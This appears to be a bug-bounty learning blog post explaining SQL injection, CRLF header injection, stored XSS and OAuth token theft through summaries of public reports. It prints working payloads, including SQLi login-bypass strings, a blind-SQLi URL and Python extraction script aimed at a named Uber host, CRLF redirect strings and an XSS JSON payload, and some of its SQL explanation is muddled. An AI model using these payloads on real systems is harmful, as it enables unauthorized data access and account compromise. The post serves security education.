Day 7/100 Hack and Improvement

4 minute read

There are so many vulnerabilities to talk about, but usually there is always some kind of SQL injection that will surprise some of the readers. For day 7, we’ll be explaining SQL injection with its SQL sintax, where to find HTTP Splitting, explanations for some XSS writeups, and Rajesh Ranjan brings concepts about OAuth security.

SQL Injections

From Sam (CoffeeJunkie), When an attacker is allowed to insert SQL queries and get results from the backend related to the SQL database, this is known as SQL injection (SQLi). This kind of attacks are highly rewarded depending on the capabilities of the attack, this is because of the devastating effects that the attack can have, for example, the attacker can create his own admin user in the database.

SQL Databases

Databases store information in records and fields contained in a collection of tables. Tables contain one or more columns, and a row in a table represents a record in the database. Users usually rely in this databases due to its usefulness to delete, create, read, and update the records in the database. The queries that the attacker might send, it can depend on different SQL databases such as MySQL, PostgreSQL, MSSQL, and so on. This is a common example of a MySQL query which will show the table for records where the ID column is equal to 1.

SELECT name FROM users WHERE id = 1;

The payload that can be useful in the attack strongly depends on the backend and how the input is being sanitize, as an example we have the following payload in a login page.

admin' OR 1='1

The payload from above basically is opening with a single quote (') which after the value admin adds the SQL code which is or 1='1 to end the query. The operator or will modify the where clause for search records that matches with the equation 1='1. In the case if the input is being sanitize properly, the following payload will be useful.

;--, admin' OR 1='1;--

This payload accomplishes two tasks such, the semicolon (;) ends the SQL statement, and the two dashes (--) tell the database that the remainder of the text is a comment.

Write Ups and Explanations

UBER BLIND SQLI

The attacker found the vulnerability by clicking the “unsubscribe” button. This was the payload used by the attacker:

# URL decode in Base 64
http://sctrack.email.uber.com.cn/track/unsubscribe.do?p={"user_id": "5755 and sleep(12)=1", "receiver": "orange@mymail"}
# URl encoded in Base 64
http://sctrack.email.uber.com.cn/track/unsubscribe.do?p=eyJ1c2VyX2lkIjogIjU3NTUgYW5kIHNsZWVwKDEyKT0xIiwgInJlY2VpdmVyIjogIm9yYW5nZUBteW1haWwifQ==

As you can see the payload "5755 and sleep(12)=1" will cause the server to load after 12 seconds. Then, the attacker wrote the following python script which will cause to dump the name and user name.

import json
import string
import requests
from urllib import quote
from base64 import b64encode

base = string.digits + '_-@.'
payload = {"user_id": 5755, "receiver": "blog.orange.tw"}

for l in range(0, 30):
    for i in 'i'+base:
        payload['user_id'] = "5755 and mid(user(),%d,1)='%c'#"%(l+1, i)
        new_payload = json.dumps(payload)
        new_payload = b64encode(new_payload)
        r = requests.get('http://sctrack.email.uber.com.cn/track/unsubscribe.do?p='+quote(new_payload))

        if len(r.content)>0:
            print i,
            break

The report from above showed a blind SQLi where the attacker was able to see if it was vulnerable at first by putting the payload "5755 and sleep(12)=1". Remember to keep an eye on HTTP requests that have encoded parameters. Remember that most of the job can be done with sqlmap

Where to Find HTTP Splitting ?

As Sam (CoffeeJunkie) mention before in day 4 talking about CRLF vulnerabilites, there are certain places where an attacker is likely to find these kind of vulnerabilities. I really wanted to expand the scope of this vulnerability because it seemed pretty interesting to me.

Different Ways to exploit CRLF attacks

Looking on different resources on GitHub, the amazing reasearcher EdOverflow has a cheatsheet for different kind of attacks, this is the cheat sheet for CRLF injection. As a “takeaway” from here, I’d like to name the CRLF chained with Open Redirect server misconfiguration with the following payloads.

//www.google.com/%2f%2e%2e%0d%0aheader:header
/www.google.com/%2e%2e%2f%0d%0aheader:header
/google.com/%2F..%0d%0aheader:header

XSS Write Ups and Explanations

In a path withe purpose to expand knowledge and obtain a good understanding of a vulnerability, besides practice, write ups are a good part of the learning path because the are “real world” examples of actual vulnerabilities. In this case I’d like to expand more in XSS where the following writeups will bring a better understanding on the attack and vulnerability.

GOOGLE TAG MANAGER STORED XSS

So, the researcher was in charge to test different fields in a Google service called tagmanager which was used for SEO operations. As the attacker comment, most of the fields were protected against special characters, therefore, it was not being useful.

nmap scan

Then, the researcher saw the chance to upload a set of definitions in JSON files. Therefore, the attacker proceed to upload a JSON file with the following content.

      "data": {
        "name": "#“><img src=/ onerror=alert(3)>",
        "type": "AUTO_EVENT_VAR",
        "autoEventVarMacro": {
          "varType": "HISTORY_NEW_URL_FRAGMENT"
        }

After the file was uploaded, the payload was executed. This is the following video step by step of the exploitation.

Source

What is OAuth

Rajesh Ranjan bring today good information related to OAuth which is an open-standard authorization protocol or framework that provides applications the ability for “secure designated access.” For example, you can tell Facebook that it’s OK for ESPN.com to access your profile or post updates to your timeline without having to give ESPN your Facebook password. This minimizes risk in a major way: In the event ESPN suffers a breach, your Facebook password remains safe.

Writeups about Oauth

A bigshoutout to Gaurav Narwani for his amazing blog which gave me a better understanding of Oauth, do checkout the blog here.

Oauth miscounfiguration to account takeover

Sometime, open redirect and misconfigured Oauth can lead to account takeover vulnerability. There are few blogs about the same

Hackerone Reports

  1. Here is a report in which, due to an open redirect, attacker was able to steal the oauth token of victim

https://hackerone.com/reports/541701

https://hackerone.com/reports/314814

  1. Here is the another report, in which attacker was able to steal the oauth token of victim due to the open redirect

https://hackerone.com/reports/665651

Conclusion

SQL Injection, HTTP Splitting attacks, and OAuth misconfigurations can lead to further attacks which can compromise users in a extend variety of forms.

Leave a comment